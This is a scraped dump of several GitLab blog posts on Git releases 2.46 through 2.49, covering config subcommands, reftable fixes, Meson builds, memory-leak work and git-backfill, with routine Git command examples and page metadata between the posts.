and another is\nupdated in a transaction. These new symref instructions can be used in\ncombination with the pre-existing instructions to perform all manner of\nreference updates now in a single transaction. Check out the\n[documentation](https://git-scm.com/docs/git-update-ref) for more information regarding each of these new instructions.\n\nThis project was led by [Karthik Nayak](https://gitlab.com/knayakgl).\n\n## UX improvements for git-config(1)\n\nThe git-config(1) command allows repository and global options to be viewed and configured. The modes used to interact with configuration can be selected explicitly using flags or determined implicitly based on the number of arguments provided to the command. For example:\n\n```shell\n$ git config --list\n# Explicit retrieval of username configuration\n$ git config --get user.name\n# Implicit retrieval of username configuration\n$ git config user.name\n# Explicit setting of username configuration\n$ git config --set user.name \"Sidney Jones\"\n# Implicit setting of username configuration\n$ git config user.name \"Sidney Jones\"\n# An optional third argument is also accepted. What do you think this does?\n$ git config \u003Cname> [\u003Cvalue> [\u003Cvalue-pattern>]]\n```\n\nOverall, the [git-config(1)](https://git-scm.com/docs/git-config) user\ninterface is not consistent with how other more modern Git commands work where you usually use subcommands. For example, `git remote list`. This release introduces `list`, `get`, `set`, `unset`, `rename-section`, `remove-section`, and `edit` as subcommands for use with the config command while also keeping the old-style syntax available. This change aims to improve user experience by adapting the config command to follow more UI practices and better conform to other commands within Git. For example:\n\n```shell\n$ git config list\n$ git config get user.name\n$ git config set user.name \"Sidney Jones\"\n```\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Addressed performance regression\n\nGit operations that leverage attributes rely on reading `.gitattributes` files found in the repository’s working-tree. This is problematic for bare Git repositories because by definition they lack a working-tree. To get around this, Git has the `attr.tree` configuration that allows a source tree to be specified and used to lookup attributes from.\n\nIn Git release 2.43.0, Git started using the tree of `HEAD` as the source of Git attributes for bare repositories by default. Unfortunately, the additional overhead due to scanning for Git attributes files had severe performance impacts. This is because, when `attr.tree` is set, each attribute lookup requires walking the source tree to check for an associated `.gitattributes` file. The larger and deeper the source tree of the repository is, the more pronounced the performance regression becomes. For example, benchmarks run on the linux.git repository showed\ngit-pack-objects(1) taking 1.68 times longer to complete. This could lead to slowdowns when performing clones or fetches.\n\n```\n# attr.tree set to HEAD as done by default in Git version 2.43.0.\nBenchmark 1: git -c attr.tree=HEAD pack-objects --all --stdout \u003C/dev/null >/dev/null\n  Time (mean ± σ):     133.807 s ±  4.866 s    [User: 129.034 s, System: 6.671 s]\n  Range (min … max):   128.447 s … 137.945 s    3 runs\n\n# attr.tree is set to an empty tree to disable attribute lookup as done in Git versions prior to 2.43.0.\nBenchmark 2: git -c attr.tree=4b825dc642cb6eb9a060e54bf8d69288fbee4904 pack-objects --all --stdout \u003C/dev/null >/dev/null\n  Time (mean ± σ):     79.442 s ±  0.822 s    [User: 77.500 s, System: 6.056 s]\n  Range (min … max):   78.583 s … 80.221 s    3 runs\n```\n\nSome of the most notable Git commands that were affected were `clone`, `pull`, `fetch`, and `diff` when, as previously mentioned, used on repositories with large or deep trees. Consequently, the `attr.tree` configuration was partially reverted to no longer be set to `HEAD` by default to address the performance regression. To learn more, check out this\n[thread](https://lore.kernel.org/git/CAKOHPAn1btewYTdLYWpW+fOaXMY+JQZsLCQxUSwoUqnnFN_ohA@mail.gmail.com/) on the mailing list.\n\n## Unit-test migration\n\nHistorically, testing in the Git project has been done via end-to-end tests\nimplemented as shell scripts. The Git project has relatively recently\nintroduced a unit-testing framework written in C. This new testing framework\nbrings opportunities for more in-depth testing of low-level implementation\ndetails at the individual function call level and helps complement the existing end-to-end tests. There are some existing end-to-end tests that are a better fit as unit-tests and thus are good candidates to be ported.\n\nThis year, GitLab is again helping mentor [Google Summer of Code (GSoC)](https://summerofcode.withgoogle.com/) contributors working in the Git project. Thanks to efforts from these ongoing GSoC projects and also the wider Git community, some existing tests are being refactored and migrated to the unit-testing framework. During this last release cycle, there have been several contributions towards the goal of improving the testing in the Git project. To follow development progress for these GSoC contributor projects, check out [Chandra’s](https://chand-ra.github.io/) and [Ghanshyam’s](https://spectre10.github.io/posts/) blogs.\n\n## Bundle URI fixes\n\nUsually when a client fetches from a remote repository, all required objects\nare sent in a packfile computed by the remote server. To avoid some of this\ncomputation, servers can opt to advertise prebuilt “bundles” stored separately from the remote server which contain sets of references and objects that the client may need. The client can fetch these bundles first through a mechanism called [bundle-uri](https://git-scm.com/docs/bundle-uri).\n\nThanks to [Xing Xin](https://lore.kernel.org/git/pull.1730.git.1715742069966.gitgitgadget@gmail.com/), an issue was identified and fixed where Git, despite having downloaded some bundles, was still downloading everything from the remote as if there were no bundles. This was due to Git not correctly discovering all the downloaded bundles, which resulted in having to fetch the consecutive ones from the remote. With this fixed, remotes using the bundle-uri mechanism can avoid having to perform redundant work and improve performance.\n\n## Read more\n\nThis article highlighted just a few of the contributions made by GitLab and\nthe wider Git community for this latest release. You can learn about these from the [official release announcement](https://lore.kernel.org/git/xmqqzfq0i0qa.fsf@gitster.g/T/#u) of the Git project. Also, check out our [previous Git release blog posts](https://about.gitlab.com/blog/tags/git/) to see other past highlights of contributions from GitLab team members.",[751,9,267],{"slug":5327,"featured":91,"template":689},"whats-new-in-git-2-46-0","content:en-us:blog:whats-new-in-git-2-46-0.yml","Whats New In Git 2 46 0","en-us/blog/whats-new-in-git-2-46-0.yml","en-us/blog/whats-new-in-git-2-46-0",{"_path":5333,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5334,"content":5340,"config":5345,"_id":5347,"_type":14,"title":5348,"_source":16,"_file":5349,"_stem":5350,"_extension":19},"/en-us/blog/whats-new-in-git-2-47-0",{"title":5335,"description":5336,"ogTitle":5335,"ogDescription":5336,"noIndex":6,"ogImage":5337,"ogUrl":5338,"ogSiteName":673,"ogType":674,"canonicalUrls":5338,"schema":5339},"What's new in Git 2.47.0?","Learn about the latest version of Git, including new global variables to configure reference and object hash formats. Discover contributions from GitLab's Git team and the wider Git community.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663691/Blog/Hero%20Images/AdobeStock_752438815.jpg","https://about.gitlab.com/blog/whats-new-in-git-2-47-0","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What's new in Git 2.47.0?\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Justin Tobler\"}],\n        \"datePublished\": \"2024-10-07\",\n      }",{"title":5335,"description":5336,"authors":5341,"heroImage":5337,"date":5342,"body":5343,"category":10,"tags":5344},[5303],"2024-10-07","The Git project recently released [Git v2.47.0](https://lore.kernel.org/git/xmqqa5fg9bsz.fsf@gitster.g/).\nLet's look at a few notable highlights from this release, which includes\ncontributions from GitLab's Git team and the wider Git community.\n\n## New global configuration options\n\nIf you have been following recent Git releases, you are probably familiar with the new \"reftable\" reference backend that became available with\n[Git version 2.45](https://about.gitlab.com/blog/whats-new-in-git-2-45-0/). Check out our [Beginner's guide to the Git reftable format](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/) to learn more. Previously, in order to initialize a repository with the \"reftable\" format, the `--ref-format` option needed to be passed to git-init(1):\n\n```sh\n$ git init --ref-format reftable\n```\n\nWith the 2.47 release, Git now has the `init.defaultRefFormat` configuration\noption, which tells Git which reference backend to use when initializing a\nrepository. This can be used to override the default \"files\" backend and begin using the \"reftable\" backend. To configure, execute the following:\n\n```sh\n$ git config set --global init.defaultRefFormat reftable\n```\n\nAs some of you may know, the object hash format used by Git repositories is\nalso configurable. By default, repositories are initialized to use the SHA-1\nobject format. An alternative is the SHA-256 format, which is more secure and future-proof. You can read more about this in one of our\n[previous blog posts on SHA-256 support in Gitaly](https://about.gitlab.com/blog/sha256-support-in-gitaly/#what-is-sha-256%3F). A SHA-256 repository can be created by passing the `--object-format` option to git-init(1):\n\n```sh\n$ git init --object-format sha256\n```\n\nIn this Git release another configuration option, `init.defaultObjectFormat`, has been added. This option tells Git which object format to use by default when initializing a repository. To configure, execute the following:\n\n```sh\n$ git config set --global init.defaultObjectFormat sha256\n```\n\nSomething to note, SHA-256 repositories are not interoperable with SHA-1\nrepositories and not all forges support hosting SHA-256 repositories. GitLab\nrecently announced [experimental support for SHA-256 repositories](https://about.gitlab.com/blog/gitlab-now-supports-sha256-repositories/) if you want to try it out.\n\nThese options provide a useful mechanism to begin using these repository\nfeatures without having to consciously think about it every time you initialize a new repository.\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## New subcommand for git-refs(1)\n\nIn the previous Git release, the [git-refs(1)](https://git-scm.com/docs/git-refs) command was introduced to provide low-level access to references in a\nrepository and provided the \"migrate\" subcommand to convert between reference backends. This release adds a new \"verify\" subcommand which allows the user to check the reference database for consistency. To verify the consistency of a repository, we often execute [git-fsck(1)](https://git-scm.com/docs/git-fsck).\n\nNotably, this command does not explicitly verify the reference database of the repository though. With the introduction of the \"reftable\" reference format, which is a binary format and thus harder to inspect manually, it is now even more important that tooling be established to fill this gap. Let's set up a repository with an invalid reference to demonstrate:\n\n```sh\n# The \"files\" backend is used so we can easily create an invalid reference.\n$ git init --ref-format files\n$ git commit --allow-empty -m \"init\"\n# A lone '@' is not a valid reference name.\n$ cp .git/refs/heads/main .git/refs/heads/@\n$ git refs verify\nerror: refs/heads/@: badRefName: invalid refname format\n```\n\nWe can see the invalid reference was detected and an error message printed to the user. While this tooling is not something the end-user will likely run, it is particularly useful on the server side to ensure repositories remain consistent. Eventually, the goal is to integrate this command as part of git-fsck(1) to provide a unified way to execute repository consistency checks.\n\nThis project was led by Jialuo She as part of the Google Summer of Code. To\nlearn more, you can read Jialuo's [GSoC report](https://luolibrary.com/2024/08/25/GSoC-Final-Report/).\n\n## Ongoing reftables work\n\nThis release also includes fixes for some bugs found in the \"reftable\" backend. One of these bugs is particularly interesting and revolves around how table compaction was being performed.\n\nAs you may recall, the reftable backend consists of a series of tables\ncontaining the state of all the references in the repository. Each atomic set of reference changes results in a new table being written and recorded in the \"tables.list\" file. To reduce the number of tables present, after each reference update, the tables are compacted to follow a geometric sequence by file size. After the tables are compacted, the \"tables.list\" file is updated to reflect the new on-disk state of the reftables.\n\nBy design, concurrent table writes and compaction is allowed. Synchronization at certain points is controlled through the use of lock files. For example, when compaction is starting the \"tables.list\" file is initially locked so the file can be consistently read and the tables requiring compaction can also be locked. Since the actual table compaction can take a while the lock is released, allowing concurrent writes to proceed. This is safe because concurrent writers know that they must not modify the now-locked tables which are about to be compacted. When the newly compacted tables have finished being written, the \"tables.list\" file is locked again and this time it is updated to reflect the new table state.\n\nThere is a problem though: What happens if a concurrent reference update writes a new table to the \"tables.list\" in the middle of table compaction after the initial lock was released, but before the new list file was written? If this race were to occur, the compacting process would not know about the new table and consequently rewrite the \"tables.list\" file without the new table. This effectively drops the concurrent update and could result in references not being added, updated, or removed as expected.\n\nLuckily, the fix to remediate this problem is rather straightforward. When the compacting process acquires the lock to write to the \"tables.list\" it must first check if any updates to the file have occurred and reload the file. Doing so ensures any concurrent table updates are also reflected appropriately. For more information on this fix, check out the corresponding\n[mailing-list thread](https://lore.kernel.org/git/cover.1722435214.git.ps@pks.im/).\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Fixes for git-maintenance(1)\n\nAs a repository grows, it is important that it is properly maintained. By\ndefault, Git executes\n[git-maintenance(1)](https://git-scm.com/docs/git-maintenance) after certain\noperations to keep the repository healthy. To avoid performing unnecessary\nmaintenance, the `--auto` option is specified which uses defined heuristics to determine whether maintenance tasks should be run. The command can be\nconfigured to perform various different maintenance tasks, but by default, it simply executes [git-gc(1)](https://git-scm.com/docs/git-gc) in the background and allows the user to carry on with their business.\n\nThis works as expected until maintenance is configured to perform non-default maintenance tasks. When this happens the configured maintenance tasks are performed in the foreground and the initial maintenance process doesn't exit until all tasks complete. Only the \"gc\" task detaches into the background as expected. It turns out this was because git-gc(1), when run with `--auto`, was accidentally detaching itself, and other maintenance tasks had no means to do so. This had the potential to slow down certain Git commands as auto-maintenance had to run to completion before they could exit.\n\nThis release addresses this issue by teaching git-maintenance(1) the `--detach` option, which allows the whole git-maintenance(1) process to run in the background instead of individual tasks. The auto-maintenance performed by Git was also updated to use this new option. For more information on this fix, check out the [mailing-list thread](https://lore.kernel.org/git/cover.1723533091.git.ps@pks.im/).\n\nA little earlier it was mentioned that the auto-maintenance uses a set of\nheuristics to determine whether or not certain maintenance operations should be performed. Unfortunately for the \"files\" reference backend, when\n[git-pack-refs(1)](https://git-scm.com/docs/git-pack-refs) executes with the\n`--auto` option, there is no such heuristic and loose references are\nunconditionally packed into a \"packed-refs\" file. For repositories with many\nreferences, rewriting the \"packed-refs\" file can be quite time-consuming.\n\nThis release also introduces a heuristic that decides whether it should pack\nloose references in the \"files\" backend. This heuristic takes into account the size of the existing \"packed-refs\" file and the number of loose references present in the repository. The larger the \"packed-refs\" file gets, the higher the threshold for the number of loose references before reference packing occurs. This effectively makes reference packing in the \"files\" backend less aggressive while still keeping the repository in a maintained state. Check out the [mailing-list thread](https://lore.kernel.org/git/cover.1725280479.git.ps@pks.im/)\nfor more info.\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Code refactoring and maintainability improvements\n\nIn addition to functional changes, there is also work being done to refactor\nand clean up the code. These improvements are also valuable because they help move the project closer toward the longstanding goal of libifying its internal components. To read more, here is a recent\n[update thread](https://lore.kernel.org/git/eoy2sjhnul57g6crprxi3etgeuacjmgxpl4yllstih7woyuebm@bd62ib3fi2ju/) regarding libification.\n\nOne area of improvement has been around resolving memory leaks. The Git project has quite a few memory leaks. For the most part, these leaks don't cause much trouble because usually a Git process only runs for a short amount of time and the system cleans up after, but in the context of libification it becomes something that should be addressed. Tests in the project can be compiled with a leak sanitizer to detect leaks, but due to the presence of existing leaks, it is difficult to validate and enforce that new changes do not introduce new leaks. There has been an ongoing effort to fix all memory leaks surfaced by existing tests in the project. Leak-free tests are subsequently marked with `TEST_PASSES_SANITIZE_LEAK=true` to indicate that they are expected to be free of leaks going forward. Prior to this release, the project had 223 test files containing memory leaks. This has now been whittled down to just 60 in this release.\n\nAnother ongoing effort has been to reduce the use of global variables\nthroughout the project. One such notorious global variable is `the_repository`, which contains the state of the repository being operated on and is referenced all over the project. This release comes with a number of patches that remove uses of `the_repository` in favor of directly passing the value where needed. Subsystems in the Git project that still depend on `the_repository` have `USE_THE_REPOSITORY_VARIABLE` defined allowing the global to be used. Now the refs, config, and path subsystems no longer rely on its use.\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab)\nwith the help of [John Cai](https://gitlab.com/jcaigitlab) and\n[Jeff King](https://github.com/peff).\n\n## Read more\n\nThis blog post highlighted just a few of the contributions made by GitLab and the wider Git community for this latest release. You can learn about these from the [official release announcement](https://lore.kernel.org/git/xmqqa5fg9bsz.fsf@gitster.g/)\nof the Git project. Also, check out our [previous Git release blog posts](https://about.gitlab.com/blog/tags/git/)\nto see other past highlights of contributions from GitLab team members.\n\n- [What’s new in Git 2.46.0?](https://about.gitlab.com/blog/whats-new-in-git-2-46-0/)\n- [What's new in Git 2.45.0?](https://about.gitlab.com/blog/whats-new-in-git-2-45-0/)\n- [A beginner's guide to the Git reftable format](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/)\n- [Git pull vs. git fetch: What's the difference?](https://about.gitlab.com/blog/git-pull-vs-git-fetch-whats-the-difference/)",[751,9,267],{"slug":5346,"featured":91,"template":689},"whats-new-in-git-2-47-0","content:en-us:blog:whats-new-in-git-2-47-0.yml","Whats New In Git 2 47 0","en-us/blog/whats-new-in-git-2-47-0.yml","en-us/blog/whats-new-in-git-2-47-0",{"_path":5352,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5353,"content":5358,"config":5363,"_id":5365,"_type":14,"title":5366,"_source":16,"_file":5367,"_stem":5368,"_extension":19},"/en-us/blog/whats-new-in-git-2-48-0",{"title":5354,"description":5355,"ogTitle":5354,"ogDescription":5355,"noIndex":6,"ogImage":5337,"ogUrl":5356,"ogSiteName":673,"ogType":674,"canonicalUrls":5356,"schema":5357},"What’s new in Git 2.48.0?","Learn about the latest version of Git, including a new build system and optimization in the new reftable backend. Discover contributions from GitLab's Git team and the Git community.","https://about.gitlab.com/blog/whats-new-in-git-2-48-0","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What’s new in Git 2.48.0?\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Christian Couder\"}],\n        \"datePublished\": \"2025-01-10\",\n      }",{"title":5354,"description":5355,"authors":5359,"heroImage":5337,"date":5360,"body":5361,"category":10,"tags":5362},[1492],"2025-01-10","The Git project recently released [Git 2.48.0](https://lore.kernel.org/git/xmqqplku7cvm.fsf@gitster.g/). Let's look at a few notable highlights from this release, which includes contributions from GitLab's Git team and the wider Git community.\n\n## Meson build system\n\nFor a long time, Git could be built using either a [Makefile](https://en.wikipedia.org/wiki/GNU_Make)-based build system or an [Autoconf](https://en.wikipedia.org/wiki/Autoconf)-based build system. Git developers have been using mostly the Makefile-based build system, so\n[the Autoconf-based build system has lagged behind](https://lore.kernel.org/git/GV1PR02MB848925A79A9DD733848182D58D662@GV1PR02MB8489.eurprd02.prod.outlook.com/) in features and maintenance. Another issue was that a lot of Windows\ndevelopers use integrated development environments (IDEs) that don’t\nhave good support for Makefile- and Autoconf-based build systems.\n\nIn 2020, support for building Git using [CMake](https://cmake.org/) was added. CMake added better Windows support and IDE integration, especially for Visual\nStudio. Some modern build system features like out-of-source builds were also included.\n\nRecently, it appeared the CMake support was also lagging\nbehind and that it might never be a good option to replace the two other\nbuild systems. So [Patrick Steinhardt](https://gitlab.com/pks-gitlab), GitLab Git Engineering Manager, implemented support for the [Meson](https://mesonbuild.com/) build\nsystem with the goal of eventually replacing the Autoconf-, CMake-, and\nmaybe the Makefile-based build systems.\n\nThe new Meson-based build system has the following advantages:\n* Allows users to easily find the available build options, something which is difficult with Makefiles and CMake\n* Has a simple syntax compared to Autoconf and CMake\n* Supports many different operating systems, compilers, and IDEs\n* Supports modern build system features like out-of-source builds\n\nHere is an example of how it can actually be used to build Git:\n\n```shell\n$ cd git             \t# go into the root of Git's source code\n$ meson setup build/ \t# setup \"build\" as a build directory\n$ cd build           \t# go into the \"build\" directory\n$ meson compile      \t# actually build Git\n$ meson test         \t# test the new build\n$ meson install      \t# install the new build\n\n```\n\nMultiple build directories can be set up using `meson setup \u003Cbuild_dir>`, and the configuration of the build inside a build directory can be viewed or changed by running `meson configure` inside the build directory.\n\nMore information on how to build Git using Meson can be found at the top of the [`meson.build` file](https://gitlab.com/gitlab-org/git/-/blob/master/meson.build) in the Git code repository. A\n[comparison of the different build systems](https://gitlab.com/gitlab-org/git/-/blob/master/Documentation/technical/build-systems.txt) for Git is available as part of Git's technical documentation.\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Git is now memory-leak-free (as exercised by the test suite)\n\nIn our Git release blog post about the previous Git 2.47.0 release, we\ntalked about our [ongoing effort to fix all memory leaks](https://about.gitlab.com/blog/whats-new-in-git-2-47-0/#code-refactoring-and-maintainability-improvements) surfaced by existing tests in the project. We said that prior to the Git 2.47.0 release, the project had 223 test files containing memory\nleaks, and that this had been whittled down to just 60.\n\nWe are pleased to report that the memory leaks in all 60 remaining test files have been resolved. As a result, Git, as exercised by the test suite, is now free of memory leaks. This is an important step towards the longstanding goal of “libifying” Git internal components (which means converting those components into internal libraries). It will also help with optimizing Git for memory usage.\n\nNow, any newly added test must be leak-free by default. It's still\npossible to have leaking tests, but the authors will have to use an\nescape hatch for that and provide good arguments why their test cannot\nbe made leak free.\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Improved bundle URI checks\n\nIn our Git release blog post about the Git 2.46.0 release, we talked\nabout some [bundle URI fixes](https://about.gitlab.com/blog/whats-new-in-git-2-46-0/#bundle-uri-fixes)\nby [Xing Xin](https://lore.kernel.org/git/pull.1730.git.1715742069966.gitgitgadget@gmail.com/).\nAfter those fixes, Xing Xin worked on making it possible for [fetches using bundles to be fully checked](https://lore.kernel.org/git/pull.1730.v8.git.1718770053.gitgitgadget@gmail.com/)\nusing the [fsck](https://git-scm.com/docs/git-fsck) mechanism like regular fetches.\n\nWhen validating regular fetches, it's possible to specify\n[different severities](https://git-scm.com/docs/git-fsck#Documentation/git-fsck.txt-fsckltmsg-idgt) for [different fsck issues](https://git-scm.com/docs/git-fsck#_fsck_messages)\nto have fine-grained handling of what is accepted and what is rejected in a specific repository. This wasn't possible for fetches using bundles previously.\n\nTo further increase the usefulness and safety of [bundle-uri](https://git-scm.com/docs/bundle-uri), we [addressed this problem](https://lore.kernel.org/git/20241121204119.1440773-1-jltobler@gmail.com/) so that the different severities specified for different fsck issues\nare now used when checking fetches using bundles, too.\n\nThis project was led by [Justin Tobler](https://gitlab.com/justintobler).\n\n## Add reference consistency checks\n\nIn our Git release blog post about the Git 2.47.0 release, we mentioned Jialuo She's work on\n[adding a new 'verify' subcommand](https://about.gitlab.com/blog/whats-new-in-git-2-47-0/#new-subcommand-for-git-refs(1)) to git-refs(1) which was part of the\n[Google Summer of Code 2024](https://summerofcode.withgoogle.com/archive/2024/projects/ukm4PTEF) (GSoC 2024).\n\nIn that blog post, we said that eventually the goal was to integrate this new subcommand as part of git-fsck(1) to provide a unified way to execute repository consistency checks. Jialuo She has decided to work on that after his GSoC was over.\n\nThe result from [this effort](https://lore.kernel.org/git/ZrtrT1CPI4YUf5db@ArchLinux/)\nis that git-fsck(1) can now detect and handle a number of reference-related issues, like when the content of a reference is bad, when a symbolic link is used as a symbolic reference, or when the target of a symbolic reference doesn't point to a valid reference. We still need to call `git refs verify` as part of git-fsck(1), and have the former perform all non-backend-specific checks that the latter currently does, but we are closer to our end goal of a unified way to execute all refs consistency checks.\n\nThis project was led by Jialuo She.\n\n## Iterator reuse in reftables\n\nIn the [Git 2.45.0](https://gitlab.com/gitlab-org/git/-/raw/master/Documentation/RelNotes/2.45.0.txt) release, the 'reftables' format was introduced as a new backend for storing references (mostly branches and tags). If you are not yet\nfamiliar with the reftables backend, check out our previous [Git release blog post](https://about.gitlab.com/blog/whats-new-in-git-2-45-0/) where the feature was introduced and our beginner’s guide to [learn more about how reftables work](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/).\n\nSince that release, we continued to improve this backend, and we recently focused on improving its performance by [reusing some internal iterators](https://lore.kernel.org/git/cover.1730732881.git.ps@pks.im/) when reading random references. Before these changes, reading a single reference required us to create a whole new iterator, seek it to the correct location in the respective tables, and then read the next value from it, which can be quite inefficient when reading many references in quick succession. After the change we now only create a single iterator and reuse it to read multiple references, thus saving some overhead.\n\nThe result of this work is increased performance in a number of reftables-related use cases, especially a 7% speedup when creating many references in a transaction that performs many random reads. Furthermore, this creates the possibility for more optimizations as we can continue to reuse more state kept in the iterators.\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Support for reflogs in `git-refs migrate`\n\nAfter the 'reftables' backend was introduced in Git 2.45.0 (see the section above), we worked on tooling to migrate reference backends in Git 2.46.0, which consisted of adding a new `migrate` subcommand to git-refs(1).\n\nOur article about Git 2.46.0 [talked about this work](https://about.gitlab.com/blog/whats-new-in-git-2-46-0/#tooling-to-migrate-reference-backends) and mentioned some limitations that still existed. In particular, the article said:\n\n\"The reflogs in a repository are a component of a reference backend and would also require migration between formats. Unfortunately, the tooling is not yet capable of converting reflogs between the files and reftables backends.\"\n\nWe are pleased to report that we have [lifted this limitation in Git 2.48.0](https://lore.kernel.org/git/20241216-320-git-refs-migrate-reflogs-v4-0-d7cd3f197453@gmail.com/).\nReflogs can now also be migrated with `git refs migrate`. The migration tool is not yet capable of handling a repository with multiple worktrees, but this is the only limitation left. If you\ndon't use worktrees, you can already take advantage of the reftables backend in your existing repositories.\n\nThis project was led by [Karthik Nayak](https://gitlab.com/knayakgl).\n\n## Ref-filter optimization\n\nThe 'ref-filter' subsystem is some formatting code used by commands like `git for-each-ref`, `git branch` and `git tag` to sort, filter, format, and display information related to Git references.\n\nAs repositories grow, they can contain a huge number of references. This is why there is work not only on improving backends that store references, like the reftables backend (see above), but\nalso on optimizing formatting code, like the 'ref-filter' subsystem.\n\nWe recently [found a way](https://lore.kernel.org/git/d23c3e3ee7fdb49fcd05b4f2e52dd2a1cfdc10f2.1729510342.git.ps@pks.im/)\nto avoid temporarily buffering references and iterating several times on them in the ref-filter code when they should be processed in the same sorting order as the order the backends provide them. This results in memory savings and makes certain commands up to 770 times faster in some\ncases.\n\nThis project was led by [Patrick Steinhardt](https://gitlab.com/pks-gitlab).\n\n## Read more\n\nThis blog post highlighted just a few of the contributions made by GitLab and the wider Git community for this latest release. You can learn about these from the official release announcement of the Git project. Also, check out [our previous Git release blog posts](https://about.gitlab.com/blog/tags/git/) to see other past highlights of contributions from GitLab team members.\n\n- [What’s new in Git 2.47.0?](https://about.gitlab.com/blog/whats-new-in-git-2-47-0/)\n- [What’s new in Git 2.46.0?](https://about.gitlab.com/blog/whats-new-in-git-2-46-0/)\n- [What’s new in Git 2.45.0](https://about.gitlab.com/blog/whats-new-in-git-2-45-0/)\n- [A beginner's guide to the Git reftable format](https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format/)\n",[751,9,267],{"slug":5364,"featured":91,"template":689},"whats-new-in-git-2-48-0","content:en-us:blog:whats-new-in-git-2-48-0.yml","Whats New In Git 2 48 0","en-us/blog/whats-new-in-git-2-48-0.yml","en-us/blog/whats-new-in-git-2-48-0",{"_path":5370,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5371,"content":5376,"config":5382,"_id":5384,"_type":14,"title":5385,"_source":16,"_file":5386,"_stem":5387,"_extension":19},"/en-us/blog/whats-new-in-git-2-49-0",{"title":5372,"description":5373,"ogTitle":5372,"ogDescription":5373,"noIndex":6,"ogImage":5304,"ogUrl":5374,"ogSiteName":673,"ogType":674,"canonicalUrls":5374,"schema":5375},"What's new in Git 2.49.0?","Learn about the latest version of Git, including improved performance thanks to zlib-ng, a new name-hashing algorithm, and git-backfill(1).","https://about.gitlab.com/blog/whats-new-in-git-2-49-0","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What's new in Git 2.49.0?\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Toon Claes\"}],\n        \"datePublished\": \"2025-03-14\",\n      }",{"title":5372,"description":5373,"authors":5377,"heroImage":5304,"date":5379,"body":5380,"category":10,"tags":5381},[5378],"Toon Claes","2025-03-14","The Git project recently released [Git 2.49.0](https://lore.kernel.org/git/xmqqfrjfilc8.fsf@gitster.g/). Let's look at a few notable highlights from this release, which includes contributions from GitLab's Git team and the wider Git community.\n\nWhat's covered:\n- [git-backfill(1) and the new path-walk API](#git-backfill(1)-and-the-new-path-walk-api)\n- [Introduction of zlib-ng](#introduction-of-zlib-ng)\n- [Continued iteration on Meson](#continued-iteration-on-meson)\n- [Deprecation of .git/branches/ and .git/remotes/](#deprecation-of-.gitbranches%2F-and-.git%2Fremotes%2F)\n- [Rust bindings for libgit](#rust-bindings-for-libgit)\n- [New name-hashing algorithm](#new-name-hashing-algorithm)\n- [Promisor remote capability](#promisor-remote-capability)\n- [Thin clone using `--revision`](#thin-clone-using---revision)\n\n## git-backfill(1) and the new path-walk API\n\nWhen you [`git-clone(1)`](https://git-scm.com/docs/git-clone) a Git repository,\nyou can pass it the\n[`--filter`](https://git-scm.com/docs/git-clone#Documentation/git-clone.txt-code--filterltfilter-specgtcode)\noption. Using this option allows you to create a _partial clone_. In a partial\nclone the server only sends a subset of reachable objects according to the given\nobject filter. For example, creating a clone with `--filter=blob:none` will not\nfetch any blobs (file contents) from the server and create a _blobless clone_.\n\nBlobless clones have all the reachable commits and trees, but no blobs. When you\nperform an operation like\n[`git-checkout(1)`](https://git-scm.com/docs/git-checkout), Git will download\nthe missing blobs to complete that operation. For some operations, like\n[`git-blame(1)`](https://git-scm.com/docs/git-blame), this might result in\ndownloading objects one by one, which will slow down the command drastically.\nThis performance degradation occurs because `git-blame(1)` must traverse the\ncommit history to identify which specific blobs it needs, then request each\nmissing blob from the server separately.\n\nIn Git 2.49, a new subcommand `git-backfill(1)` is introduced, which can be\nused to download missing blobs in a blobless partial clone.\n\nUnder the hood, the `git-backfill(1)` command leverages the new path-walk API, which is different from how Git generally iterates over commits. Rather than iterating over the commits one at a time and recursively visiting the trees and blobs associated with each commit, the path-walk API does traversal by path. For each path, it adds a list of associated tree objects to a stack. This stack is then processed in a depth-first order. So, instead of processing every object in commit `1` before moving to commit `2`, it will process all versions of file `A` across all commits before moving to file `B`. This approach greatly improves performance in scenarios where grouping by path is essential.\n\nLet me demonstrate its use by making a blobless clone of [`gitlab-org/git`](https://gitlab.com/gitlab-org/git):\n\n```shell\n$ git clone --filter=blob:none --bare --no-tags git@gitlab.com:gitlab-org/git.git\nCloning into bare repository 'git.git'...\nremote: Enumerating objects: 245904, done.\nremote: Counting objects: 100% (1736/1736), done.\nremote: Compressing objects: 100% (276/276), done.\nremote: Total 245904 (delta 1591), reused 1547 (delta 1459), pack-reused 244168 (from 1)\nReceiving objects: 100% (245904/245904), 59.35 MiB | 15.96 MiB/s, done.\nResolving deltas: 100% (161482/161482), done.\n```\n\nAbove, we use `--bare` to ensure Git doesn't need to download any blobs to check\nout an initial branch. We can verify this clone does not contain any blobs:\n\n```sh\n$ git cat-file --batch-all-objects --batch-check='%(objecttype)' | sort | uniq -c\n  83977 commit\n 161927 tree\n```\n\nIf you want to see the contents of a file in the repository, Git has to download it:\n\n```sh\n$ git cat-file -p HEAD:README.md\nremote: Enumerating objects: 1, done.\nremote: Total 1 (delta 0), reused 0 (delta 0), pack-reused 1 (from 1)\nReceiving objects: 100% (1/1), 